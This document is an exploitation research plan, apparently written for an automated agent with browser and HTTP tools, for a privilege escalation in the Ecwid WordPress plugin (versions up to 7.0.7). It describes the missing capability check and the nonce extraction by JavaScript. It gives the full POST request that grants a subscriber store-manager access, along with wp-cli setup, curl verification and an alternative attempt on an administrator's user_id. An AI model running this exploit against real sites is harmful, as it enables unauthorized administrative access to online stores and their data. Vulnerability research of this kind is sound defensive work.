Ecwid by Lightspeed Ecommerce Shopping Cart <= 7.0.7 - Authenticated (Subscriber+) Privilege Escalation via ec_store_admin_access

This exploitation research plan targets CVE-2026-1750, a privilege escalation vulnerability in the Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress.

1. Vulnerability Summary

The vulnerability exists in how the Ecwid plugin handles custom user profile fields. Specifically, the function save_custom_user_profile_fields is hooked to WordPress profile update actions but fails to perform a capability check before updating the ec_store_admin_access user meta. This allows any authenticated user (starting from the Subscriber role) to submit this parameter during a profile update and grant themselves "Store Manager" permissions within the Ecwid plugin context.

2. Attack Vector Analysis

• Endpoint: /wp-admin/profile.php
• Method: POST
• Vulnerable Parameter: ec_store_admin_access
• Required Authentication: Subscriber (any logged-in user).
• Preconditions: The plugin must be active. The attacker must be able to access their own profile page to retrieve the standard WordPress profile update nonce.

3. Code Flow (Inferred)

1. Entry Point: The user submits the profile form at wp-admin/profile.php.
2. Hook Trigger: WordPress triggers the personal_options_update action (for self-updates) or edit_user_profile_update (for updates by others).
3. Plugin Callback: The plugin's save_custom_user_profile_fields function is executed (likely registered in a class like Ecwid_Admin or within a dedicated profile fields file).
4. Processing:

   // Simplified vulnerable logic (inferred)
   function save_custom_user_profile_fields( $user_id ) {
       // Missing: if ( ! current_user_can( 'manage_options' ) ) return;
       if ( isset( $_POST['ec_store_admin_access'] ) ) {
           update_user_meta( $user_id, 'ec_store_admin_access', $_POST['ec_store_admin_access'] );
       }
   }
   

5. Sink: update_user_meta saves the value to the database, effectively elevating the user's status within the Ecwid store management interface.

4. Nonce Acquisition Strategy

This exploit uses the standard WordPress profile update nonce, not a custom plugin nonce.

1. Login: Authenticate as a Subscriber-level user.
2. Navigate: Use browser_navigate to go to http://[target]/wp-admin/profile.php.
3. Extract Nonce: Use browser_eval to extract the _wpnonce value from the form.
   • JS Command: document.querySelector('input[name="_wpnonce"]').value
4. Extract User ID: Ensure the user_id matches the current user.
   • JS Command: document.querySelector('input[name="user_id"]').value

5. Exploitation Strategy

The goal is to update the current user's meta to include ec_store_admin_access.

Step-by-Step Plan:

1. Setup: Create a subscriber user attacker.
2. Session: Use http_request or browser_navigate to login as attacker.
3. Retrieval: Navigate to the profile page and extract the _wpnonce and user_id.
4. Payload Delivery: Send a POST request to /wp-admin/profile.php mimicking a profile save.

HTTP Request Details:

• URL: http://[target]/wp-admin/profile.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body Parameters:
  • _wpnonce: [EXTRACTED_NONCE]
  • _wp_http_referer: /wp-admin/profile.php
  • from: profile
  • action: update
  • user_id: [EXTRACTED_USER_ID]
  • nickname: attacker
  • email: attacker@example.com
  • ec_store_admin_access: 1 (or on - inferred based on standard WordPress checkbox behavior)

6. Test Data Setup

1. Install and activate Ecwid by Lightspeed Ecommerce Shopping Cart (<= 7.0.7).
2. Create a subscriber user:
   wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
3. (Optional) Complete the basic Ecwid setup if the menu items are hidden behind a connection wizard.

7. Expected Results

1. The server should respond with a 302 Found redirecting back to profile.php?updated=1.
2. The database for the attacker user should now contain the ec_store_admin_access meta key.
3. Upon refreshing the dashboard, the attacker user should see Ecwid management menus (e.g., "Ecwid store") that are normally restricted to higher-privileged users.

8. Verification Steps

1. Check User Meta via CLI:
   wp user meta get attacker ec_store_admin_access
   Result should be: 1 or on.
2. Check Capability/Role Persistence:
   Verify if the user can now access the Ecwid admin dashboard page:
   curl -s -b cookies.txt http://[target]/wp-admin/admin.php?page=ecwid | grep "Store Dashboard"
3. UI Verification: Log in as the subscriber in a browser and check if the "Ecwid" sidebar menu item is visible.

9. Alternative Approaches

• Mass Assignment: Try sending ec_store_admin_access=on during registration if the plugin hooks into registration processes (less likely but possible if custom fields are enabled globally).
• Admin Impersonation: If the function doesn't check user_id, try to update another user's meta (e.g., an administrator's) by changing the user_id parameter in the POST request, although WordPress core usually blocks cross-user profile updates unless the caller is an admin. The focus here remains on the authenticated self-privilege escalation.